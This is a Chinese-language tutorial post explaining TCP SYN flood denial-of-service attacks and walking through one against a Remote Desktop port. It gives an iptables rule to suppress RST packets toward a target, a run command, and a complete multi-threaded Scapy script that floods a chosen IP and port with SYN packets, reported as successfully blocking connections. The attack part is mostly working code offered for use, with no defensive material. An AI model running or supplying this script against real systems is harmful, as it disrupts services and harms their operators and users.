赞
踩
Syn洪泛攻击:
洪泛攻击的本质是不相应B回复的SYN+ACK,导致B一直占用其系统资源,迟迟不关闭,且定时发送给A一个SYN+ACK的包,攻击方A可以控制肉鸡向B发送大量SYN消息但不响应ACK消息,或者干脆伪造SYN消息中的Source IP,使B反馈的SYN-ACK消息石沉大海,导致B被大量注定不能完成的半开连接占据,直到资源耗尽,停止响应正常的连接请求。
开始:
修改防火墙配置
# 防火墙需要进行配置,阻止RST包发出
iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.21.117 -j DROP
说明:发一个包释放一个连接,这种达不到攻击郊果。要构成攻击效果可以通过iptables限止发送RST包。
然后执行脚本(脚本内容在最下面 )
python3 syn_flood.py 受害者ip 受害者端口 数量为20
效果:
这里攻击的是3389即远程桌面的端口,我们通过win10自带的去连接,发现连接失败
至此拒绝服务攻击-泛洪攻击完成
脚本内容:
环境是python3的环境
- #!/usr/bin/python
- from scapy.all import*
- from time import sleep
- import _thread
- import random
- import logging
- logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
-
- if len(sys.argv) != 4:
- print ("Usage - ./syn_flood.py [Target-IP] [Port Number]")
- print ("Example - ./sock_stress.py 10.0.0.5 80 20")
- print ("Example will perform a 20x multi-threaded SYN flood attack")
- print ("against the HTTP (port 80) service on 10.0.0.5")
- sys.exit()
- target = str(sys.argv[1])
- port= int(sys.argv[2])
- threads = int(sys.argv[3])
- print ("Performing SYN flood.Use Ctrl+C to stop attack")
- def synflood(target,port):
- while 0 == 0:
- x = random.randint(0,65535)
- send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)
-
- for x in range(0,threads):
- _thread.start_new_thread(synflood,(target,port))
-
- while 0 == 0:
- sleep(1)
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。